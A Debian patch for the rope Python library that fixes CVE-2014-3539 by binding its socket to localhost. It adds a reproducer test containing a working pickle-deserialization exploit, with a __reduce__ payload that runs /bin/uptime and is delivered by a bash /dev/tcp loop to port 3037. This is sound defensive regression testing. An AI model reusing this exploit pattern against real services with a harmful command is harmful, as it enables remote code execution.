Package: rope / 0.10.3-1

CVE-2014-3539.patch Patch series | download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
From 7f19bb6d79d2426f4b29e531f12116398efce357 Mon Sep 17 00:00:00 2001
From: Arnaud Fontaine <arnau@debian.org>
Date: Thu, 26 Jan 2017 13:38:11 +0900
Subject: =?UTF-8?q?Mitigations=20for=20CVE-2014-3539=20from=20the=20upstre?=
 =?UTF-8?q?am=20author=20personal=20repository=0A(https://github.com/mcepl?=
 =?UTF-8?q?/rope):?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

  commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
  Author: Matěj Cepl <mcepl@cepl.eu>
  Date:   Tue Feb 10 12:34:20 2015 +0100

      Just add reporter’s suggested reproducer

  commit a6cb534debe9aff623b6b19ae2dedbf872069a50
  Author: Matej Cepl <mcepl@cepl.eu>
  Date:   Thu Feb 12 01:12:15 2015 +0100

      limit socket connections to localhost

Patch-Name: CVE-2014-3539.patch
---
 rope/base/oi/doa.py                      |  2 +-
 ropetest/CVE20143539/CVE-2014-3539.py    | 18 ++++++++++++++++++
 ropetest/CVE20143539/README.md           | 17 +++++++++++++++++
 ropetest/CVE20143539/__init__.py         | 32 ++++++++++++++++++++++++++++++++
 ropetest/CVE20143539/generate_payload.py |  8 ++++++++
 ropetest/CVE20143539/payload.txt         |  9 +++++++++
 ropetest/CVE20143539/project/hello.py    |  1 +
 ropetest/CVE20143539/run_reproducer.sh   | 11 +++++++++++
 ropetest/__init__.py                     |  3 +++
 9 files changed, 100 insertions(+), 1 deletion(-)
 create mode 100644 ropetest/CVE20143539/CVE-2014-3539.py
 create mode 100644 ropetest/CVE20143539/README.md
 create mode 100644 ropetest/CVE20143539/__init__.py
 create mode 100644 ropetest/CVE20143539/generate_payload.py
 create mode 100644 ropetest/CVE20143539/payload.txt
 create mode 100644 ropetest/CVE20143539/project/hello.py
 create mode 100644 ropetest/CVE20143539/run_reproducer.sh

diff --git a/rope/base/oi/doa.py b/rope/base/oi/doa.py
index de45902..ed44d25 100644
--- a/rope/base/oi/doa.py
+++ b/rope/base/oi/doa.py
@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
         self.data_port = 3037
         while self.data_port < 4000:
             try:
-                self.server_socket.bind(('', self.data_port))
+                self.server_socket.bind(('127.0.0.1', self.data_port))
                 break
             except socket.error:
                 self.data_port += 1
diff --git a/ropetest/CVE20143539/CVE-2014-3539.py b/ropetest/CVE20143539/CVE-2014-3539.py
new file mode 100644
index 0000000..5dd37e1
--- /dev/null
+++ b/ropetest/CVE20143539/CVE-2014-3539.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python
+# CVE-2014-3539 reproducer/exploit
+# Vasyl Kaigorodov <vkaigoro@redhat.com>
+# Tested on Python 2.7.x
+
+import sys
+from rope.base import project
+
+try:
+    open('payload.txt', 'r')
+except IOError:
+    print("payload.txt not found, run:")
+    print("\tpython generate_payload.py")
+    sys.exit(1)
+
+myproject = project.Project('project/')
+res = myproject.get_resource("hello.py")
+myproject.pycore.run_module(res)
diff --git a/ropetest/CVE20143539/README.md b/ropetest/CVE20143539/README.md
new file mode 100644
index 0000000..5c620ef
--- /dev/null
+++ b/ropetest/CVE20143539/README.md
@@ -0,0 +1,17 @@
+== List of files ==
+
+project/			- directory containing an example python module
+CVE-2014-3539.py	- python script which tries to load an example python module
+				      for re-factoring (normal workflow simulation)
+generate_payload.py - generates payload.txt (evil code to run)
+payload.txt			- example payload (running /bin/uptime)
+run_reproducer.sh	- main file that sticks above together
+
+== Usage ==
+
+Run ./run_reproducer.sh.
+If the system is vulnerable, you'll see the output similar to below:
+
+  $ ./run_reproducer.sh
+  SUCCESS:  15:13:46 up 21:26, 2 users,  load average: 0.02, 0.63, 1.01
+
diff --git a/ropetest/CVE20143539/__init__.py b/ropetest/CVE20143539/__init__.py
new file mode 100644
index 0000000..3ab3be6
--- /dev/null
+++ b/ropetest/CVE20143539/__init__.py
@@ -0,0 +1,32 @@
+import os.path
+import subprocess
+try:
+    import unittest2 as unittest
+except ImportError:
+    import unittest
+
+
+class TestCVE20143539(unittest.TestCase):
+    def test_case(self):
+        cur_dir = os.path.dirname(__file__)
+        script_name = os.path.join(cur_dir, 'run_reproducer.sh')
+        pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
+                               stderr=subprocess.PIPE, cwd=cur_dir)
+        pid.communicate()
+        self.assertEquals(pid.returncode, 0)
+
+
+def suite():
+    result = unittest.TestSuite()
+    result.addTests(unittest.makeSuite(TestCVE20143539))
+    return result
+
+
+if __name__ == '__main__':
+    import sys
+    if len(sys.argv) > 1:
+        unittest.main()
+    else:
+        runner = unittest.TextTestRunner()
+        res = runner.run(suite())
+        sys.exit(not res.wasSuccessful())
diff --git a/ropetest/CVE20143539/generate_payload.py b/ropetest/CVE20143539/generate_payload.py
new file mode 100644
index 0000000..c8d3e01
--- /dev/null
+++ b/ropetest/CVE20143539/generate_payload.py
@@ -0,0 +1,8 @@
+import cPickle
+import subprocess
+
+class RunBinSh(object):
+  def __reduce__(self):
+    return (subprocess.Popen, (('/bin/uptime',),))
+
+open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
diff --git a/ropetest/CVE20143539/payload.txt b/ropetest/CVE20143539/payload.txt
new file mode 100644
index 0000000..434dd0f
--- /dev/null
+++ b/ropetest/CVE20143539/payload.txt
@@ -0,0 +1,9 @@
+csubprocess
+Popen
+p1
+((S'/bin/uptime'
+p2
+tp3
+tp4
+Rp5
+.
\ No newline at end of file
diff --git a/ropetest/CVE20143539/project/hello.py b/ropetest/CVE20143539/project/hello.py
new file mode 100644
index 0000000..7df869a
--- /dev/null
+++ b/ropetest/CVE20143539/project/hello.py
@@ -0,0 +1 @@
+print("Hello, World!")
diff --git a/ropetest/CVE20143539/run_reproducer.sh b/ropetest/CVE20143539/run_reproducer.sh
new file mode 100644
index 0000000..b1f7fac
--- /dev/null
+++ b/ropetest/CVE20143539/run_reproducer.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
+trap "killall -- $(basename $0)" EXIT
+
+(while : ; do
+    ( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
+        && echo -n "SUCCESS: "
+done)&
+
+python CVE-2014-3539.py 2>/dev/null
+exit $?
diff --git a/ropetest/__init__.py b/ropetest/__init__.py
index f1cb459..744beee 100644
--- a/ropetest/__init__.py
+++ b/ropetest/__init__.py
@@ -16,6 +16,8 @@ import ropetest.simplifytest
 import ropetest.contrib
 import ropetest.refactor
 
+import ropetest.CVE20143539
+
 
 def suite():
     result = unittest.TestSuite()
@@ -33,6 +35,7 @@ def suite():
 
     result.addTests(ropetest.refactor.suite())
     result.addTests(ropetest.contrib.suite())
+    result.addTests(ropetest.CVE20143539.suite())
 
     return result